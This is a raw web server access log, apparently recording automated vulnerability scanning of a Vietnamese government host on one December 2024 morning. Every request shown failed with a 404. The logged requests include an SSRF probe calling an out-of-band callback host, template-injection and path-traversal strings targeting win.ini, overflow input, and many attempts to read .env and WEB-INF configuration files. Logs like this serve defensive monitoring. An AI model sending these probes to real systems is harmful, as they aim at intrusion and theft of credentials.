2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 37 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 30 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 50 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 48 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 54 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 54 2024-12-12 08:08:41 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 54 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 48 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 46 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 39 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 44 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 47 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 63 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 61 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 63 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 62 2024-12-12 08:08:59 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 37 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 40 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 30 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 32 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 31 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 34 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 31 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 31 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 54 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 61 2024-12-12 08:09:18 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 58 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 32 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 36 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 47 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 43 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 44 2024-12-12 08:09:37 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:09:38 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 32 2024-12-12 08:09:38 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 30 2024-12-12 08:09:38 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 36 2024-12-12 08:09:38 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 50 2024-12-12 08:09:38 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:09:54 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 49 2024-12-12 08:09:54 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 45 2024-12-12 08:09:54 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 39 2024-12-12 08:09:56 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 104 2024-12-12 08:09:56 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 106 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 136 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 143 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 125 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 123 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 124 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 125 2024-12-12 08:09:57 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 165 2024-12-12 08:10:06 103.153.214.94 GET /zimlet/com_zimbra_webex/httpPost.jsp companyId=http://ctd67t3bclspkptm3qo0gwwsr8c6a8tyf.oast.fun%23 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 08:10:10 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.20 - 404 7 0 208 2024-12-12 08:10:12 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 202 2024-12-12 08:10:12 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 46 2024-12-12 08:10:12 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:10:15 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 31 2024-12-12 08:10:15 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 30 2024-12-12 08:10:15 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 30 2024-12-12 08:10:15 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 55 2024-12-12 08:10:15 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 83 2024-12-12 08:10:15 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 32 2024-12-12 08:10:16 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 68 2024-12-12 08:10:16 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 68 2024-12-12 08:10:16 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:10:16 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 53 2024-12-12 08:10:16 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 57 2024-12-12 08:10:31 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 38 2024-12-12 08:10:31 103.153.214.94 GET /nuclei.svg sghzF=x 8172 - 206.238.196.225 - - 404 7 0 29 2024-12-12 08:10:39 103.153.214.94 POST /api/jsonws/invoke - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 https://bcvt.kontum.gov.vn:8172/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 7 0 201 2024-12-12 08:10:39 103.153.214.94 POST /api/jsonws/invoke - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 7 0 237 2024-12-12 08:11:20 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 08:12:46 103.153.214.94 POST /session/create - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 08:14:31 103.153.214.94 POST /cgi-bin/mainfunction.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 211 2024-12-12 08:15:14 103.153.214.94 POST /magmi/web/magmi_saveprofile.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 08:15:18 103.153.214.94 POST /magmi/web/magmi_run.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.212+Safari/537.36 - 404 7 0 206 2024-12-12 08:15:20 103.153.214.94 GET /magmi/web/info.php - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 08:16:13 103.153.214.94 GET /webroot/decision/view/ReportServer bcbbcaaa&n=${sum(1024,123)} 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 08:16:33 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 08:17:01 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 46 2024-12-12 08:17:06 103.153.214.94 GET /graph_realtime.php action=init 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 257 2024-12-12 08:18:21 103.153.214.94 POST /graphql - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.19 - 404 7 0 220 2024-12-12 08:18:37 103.153.214.94 POST /upload - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 240 2024-12-12 08:18:43 103.153.214.94 POST /getcfg.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 08:19:00 103.153.214.94 POST /storfs-asup - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 205 2024-12-12 08:19:41 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 08:21:45 103.153.214.94 POST /account/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 211 2024-12-12 08:21:48 103.153.214.94 POST /opensis/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 202 2024-12-12 08:21:52 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 229 2024-12-12 08:24:05 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.7+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 46 2024-12-12 08:24:19 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 230 2024-12-12 08:24:26 103.153.214.94 GET /wp-admin/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 08:24:37 103.153.214.94 GET /info.html - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:99.0)+Gecko/20100101+Firefox/99.0 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 205 2024-12-12 08:25:15 103.153.214.94 GET /.env.production.local - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env_1 - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 08:25:15 103.153.214.94 GET /.env.dev - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/39.0.2171.99+Safari/537.36 - 404 7 0 37 2024-12-12 08:25:15 103.153.214.94 GET /.env.production - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 41 2024-12-12 08:25:15 103.153.214.94 GET /.env_sample - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36+Edge/16.16299 - 404 7 0 38 2024-12-12 08:25:15 103.153.214.94 GET /.env.local - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env.dev.local - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 32 2024-12-12 08:25:15 103.153.214.94 GET /.env.backup - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env.bak - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-12 08:25:15 103.153.214.94 GET /.env.kontum - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 50 2024-12-12 08:25:15 103.153.214.94 GET /.env.save - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/8.0.0+Version/17.4.1+Safari/605.1.15 - 404 7 0 54 2024-12-12 08:25:15 103.153.214.94 GET /.env.example - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env.stage - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env.prod.local - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.19 - 404 7 0 33 2024-12-12 08:25:15 103.153.214.94 GET /.env.live - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 34 2024-12-12 08:25:15 103.153.214.94 GET /.env.www - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 - 404 7 0 36 2024-12-12 08:25:15 103.153.214.94 GET /api/.env - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 39 2024-12-12 08:25:15 103.153.214.94 GET /.env.prod - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 08:25:15 103.153.214.94 GET /.env.old - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 08:25:15 103.153.214.94 GET /.env.bcvt - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 54 2024-12-12 08:25:15 103.153.214.94 GET /.env.development.local - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 08:26:42 103.153.214.94 POST /cgi-bin/readycloud_control.cgi 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.24+(KHTML,+like+Gecko)+Version/17.2+Safari/616.24 - 404 7 0 225 2024-12-12 08:27:01 103.153.214.94 GET /WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 37 2024-12-12 08:27:01 103.153.214.94 GET /��/��/��/WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 12 0 32 2024-12-12 08:27:01 103.153.214.94 GET /WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 08:27:01 103.153.214.94 GET /��/WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:108.0)+Gecko/20100101+Firefox/108.0 - 404 12 0 54 2024-12-12 08:27:01 103.153.214.94 GET /��/��/WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 12 0 55 2024-12-12 08:27:01 103.153.214.94 GET /��/��/��/��/WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 12 0 56 2024-12-12 08:27:02 103.153.214.94 POST /cgi-bin/mt/mt-xmlrpc.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 08:27:53 103.153.214.94 POST /minio/webrpc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 230 2024-12-12 08:29:35 103.153.214.94 GET /info.html - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 200 2024-12-12 08:29:48 103.153.214.94 GET / author=1 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 08:29:50 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 200 2024-12-12 08:32:04 103.153.214.94 POST /adminer.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 08:32:04 103.153.214.94 POST /index.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 214 2024-12-12 08:32:04 103.153.214.94 POST /adminer/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 197 2024-12-12 08:32:04 103.153.214.94 POST /_adminer.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 201 2024-12-12 08:32:05 103.153.214.94 POST /_adminer/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 207 2024-12-12 08:32:05 103.153.214.94 POST /adminer/adminer.php - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 205 2024-12-12 08:32:10 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 197 2024-12-12 08:32:34 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 202 2024-12-12 08:33:14 103.153.214.94 POST /wp-json/buddypress/v1/signup - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 214 2024-12-12 08:34:25 103.153.214.94 GET /info.html - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 224 2024-12-12 08:34:26 103.153.214.94 POST /apply_sec.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 219 2024-12-12 08:34:28 103.153.214.94 GET /cgi/cgi_i_filter.js _tn={{trimprefix(base64_decode(httoken), 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_4;+en-US)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 198 2024-12-12 08:34:28 103.153.214.94 POST /apply_sec.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 197 2024-12-12 08:35:19 103.153.214.94 GET /����/����/����/windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 12 0 40 2024-12-12 08:35:19 103.153.214.94 GET /index.php page=....//....//windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 33 2024-12-12 08:35:19 103.153.214.94 GET /windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 08:35:19 103.153.214.94 GET /����/����/����/����/����/����/����/����/windows/win.ini - 8172 - 206.238.196.225 